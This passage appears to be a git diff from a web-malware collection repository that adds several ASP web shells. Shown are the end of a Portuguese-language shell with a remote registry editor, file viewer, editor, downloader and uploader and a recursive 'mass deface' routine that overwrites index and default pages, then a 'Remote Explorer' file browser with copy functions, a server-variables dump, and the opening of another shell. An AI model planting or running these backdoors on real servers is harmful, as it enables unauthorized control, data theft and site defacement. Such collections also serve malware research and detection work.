Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes" Then
Select Case Trim(Request.QueryString("type"))
Case "1"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
Case "2"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
Case "3"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
Case "4"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
Case "5"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
End Select
Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Else
Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
End If
Case "r"
If Trim(Request.QueryString("process")) = "yes" Then
Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case "d"
If Trim(Request.QueryString("process")) = "yes" Then
teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case Else
Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
End Select
Set WshShell = Nothing
Case "txtview"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
Set a = Nothing
Set fso = Nothing
Case "txtedit"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Request.Form.Count = 0 Then
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
Set a = Nothing
Set fso = Nothing
Else
Select Case Trim(Request.Form("savemethod"))
Case "Save"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
Case "Save as"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set objstream = fso.CreateTextFile(caminho,true,false)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
Case Else
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End Select
End If
Case "download"
Response.Buffer = True
Response.Clear
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
strFileType = Request.QueryString("type")
if strFileType = "" then strFileType = "application/download"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(strFilename)
intFilelength = f.size
Set f = Nothing
Set fso = Nothing
Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
Response.AddHeader "Content-Length", intFilelength
Response.Charset = "UTF-8"
Response.ContentType = strFileType
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Open
Stream.type = 1
Stream.LoadFromFile strFileName
Response.BinaryWrite Stream.Read
Response.Flush
Stream.Close
Set Stream = Nothing
Case "upload"
If Request.QueryString("processupload") <> "yes" Then
Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
Response.Write "<TABLE BORDER=0>"
Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
Response.Write "</TABLE>"
Else
Set Uploader = New FileUploader
Uploader.Upload()
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
For Each File In Uploader.Files.Items
File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
Response.Write "File Uploaded: " & File.FileName & "<br>"
Response.Write "Size: " & File.FileSize & " bytes<br>"
Response.Write "Type: " & File.ContentType & "<br><br>"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Next
End If
End If
Case "mass"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminhodomass)
Set ColFolders = MonRep.SubFolders
for each folderItem in ColFolders
destino1 = folderItem.path & "\index.htm"
destino2 = folderItem.path & "\index.html"
destino3 = folderItem.path & "\index.asp"
destino4 = folderItem.path & "\index.cfm"
destino5 = folderItem.path & "\index.php"
destino6 = folderItem.path & "\default.htm"
destino7 = folderItem.path & "\default.html"
destino8 = folderItem.path & "\default.asp"
destino9 = folderItem.path & "\default.cfm"
destino10 = folderItem.path & "\default.php"
MeuArquivo.Copy(destino1)
MeuArquivo.Copy(destino2)
MeuArquivo.Copy(destino3)
MeuArquivo.Copy(destino4)
MeuArquivo.Copy(destino5)
MeuArquivo.Copy(destino6)
MeuArquivo.Copy(destino7)
MeuArquivo.Copy(destino8)
MeuArquivo.Copy(destino9)
MeuArquivo.Copy(destino10)
Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
End If
Err.Number = 0
Response.Flush
If metodo = "brute" Then
Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
End If
next
End Sub
Sub brutemass(caminho,massaction)
If massaction = "test" Then
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
for each folderItem in ColFolders
Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
Set EachFolder = TotalFolders.SubFolders
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
maindestino = folderItem.path & "\"
MeuArquivo.Copy(maindestino)
Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
If EachFolder.count > 0 Then
masscontador = 0
for each subpasta in EachFolder
masscontador = masscontador + 1
destino = subpasta.path & "\"
If masscontador = 1 Then
destinofinal = destino
pathfinal = subpasta.path
Err.Number = 0
MeuArquivo.Copy(destinofinal)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
Else
MeuArquivo.Copy(destino)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
End If
next
masscontador = 0
End If
Response.Write "</table><br>"
Call brutemass(folderItem.path & "\","test")
next
Set MonRep = Nothing
Set ColFolders = Nothing
Set ColFiles0 = Nothing
Else
If Request.Form.Count = 0 Then
Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
Response.Write "<input type=""submit"" value=""w00t!""></center>"
Response.Write "</form>"
Else
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivomassdfc = patharquivotxt & "teste.txt"
Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
vetordelinhas = Split(Request.Form("content"),VbCrLf)
For i = 0 To UBound(vetordelinhas)
Arquivotxt.WriteLine(vetordelinhas(i))
Next
Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
If Request.Form("massopt") = "single" Then
Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
ElseIf Request.Form("massopt") = "brute" Then
Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
End If
End If
End If
End Sub
If Trim(Request.QueryString("massact")) = "test" Then
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivo = patharquivotxt & "_vti_cnf.log"
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
Set MeuArquivo = ObjFSO.GetFile(arquivo)
Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
End If
Case Else
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Call showcontent()
End Select
If Err.Number <> 0 Then
Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
End If
Response.Write endcode
%>

250
web-malware-collection-13-06-2012/ASP/RemExp.asp Normal file
View file

@ -0,0 +1,250 @@
<%@ Language=VBScript %>
<%
Option Explicit
Dim giCount
Dim gvAttributes
Dim Ext
Dim ScriptFolder
Dim FolderPath
Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File
Dim BgColor, BackgroundColor,FSO
If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
End If
If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
End If
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
FolderPath = Request.QueryString("FolderPath")
If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If
FolderPath = ParseFolder(FolderPath)
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: #C0C0C0
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
td, input, select
{
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<body bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a> (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
</tr>
<%Next%>
</table>
</body>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function
Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "#efefef"
Else
BgColor = "#ffffff"
End If
End Sub
Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
Attributes = lsResult
End Function
Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function
Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "\" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "\" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>

27
web-malware-collection-13-06-2012/ASP/Server Variables.asp Normal file
View file

@ -0,0 +1,27 @@
<%
Dim Vars
%>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server
variables : </strong> </font></p>
<p><BR>
<BR>
</p>
<TABLE width="75%" BORDER=1 align="center" cellpadding="3" cellspacing="0">
<TR>
<TD width="149"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server
Variable Name</B></font></p>
</TD>
<TD width="333"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server
Variable Value</B></font></p>
</TD>
</TR>
<% For Each Vars In Request.ServerVariables %>
<TR>
<TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Vars %></FONT></TD>
<TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Request.ServerVariables(Vars) %>&nbsp;</FONT></TD>
</TR>
<% Next %>
</TABLE>

765
web-malware-collection-13-06-2012/ASP/aspSH.v1.txt Normal file
View file

@ -0,0 +1,765 @@
<% @language="javascript" %>
<SCRIPT language="VBScript" runat="server">
' Stuff that should have been available in UNICODE through some IIS object
' but has to be done in VBScript, sigh...
Function Request_RawData()
Dim vArray, sResult, I
vArray = Request.BinaryRead(Request.TotalBytes)
sResult = ""
For I = 1 To LenB(vArray)
sResult = sResult & ChrW(AscB(MidB(vArray, I, 1)))
Next
Request_RawData = sResult
End Function
Function Response_RawData(sString)
Dim vArray, I
vArray = ""
For I = 1 To Len(sString)
vArray = vArray & ChrB(Asc(Mid(sString, I, 1)))
Next
Response.BinaryWrite(vArray)
End Function
</SCRIPT>
<SCRIPT language="JavaScript" runat="server">
/****************************************************************************
Stuff that should have been in the JavaScript language in the first place
****************************************************************************/
// Turn the given string into HTML by replacing any control characters
// with their HTML encoded equivalent, such as replacing '\n' with "<BR>"
function HTMLencode(sText) {
return sText.replace(/[\<\>\"\&\r\n \t]/g, function (sChar, iIndex) {
switch (sChar) {
case '\r': return "";
case '\n': return "<BR>";
case ' ': return "&nbsp;";
case '\t': return "&nbsp;&nbsp;&nbsp;&nbsp;";
default: return "&#" + sChar.charCodeAt(0) + ";";
}
});
}
// Turn the given string into a JS string by replacing anything that breaks
// compilation, is not ASCII or terminates the string with an encoded char,
// such as replacing '\n' with "\x0D".
function JSencode(sText) {
return sText.replace(/[\x00-\x1F\"\'\\\u0100-\uFFFF]/g, function (c) {
var sic = c.charCodeAt(0).toString(16);
if (sic.length == 1) return "\\x0" + sic;
if (sic.length == 2) return "\\x" + sic;
if (sic.length == 3) return "\\u0" + sic;
return "\\u" + sic;
});
}
/****************************************************************************
Stuff that should have been in the IIS Objects in the first place.
****************************************************************************/
// Return the value of a GET variable or a default value if it's either not
// supplied or there is more than one such value.
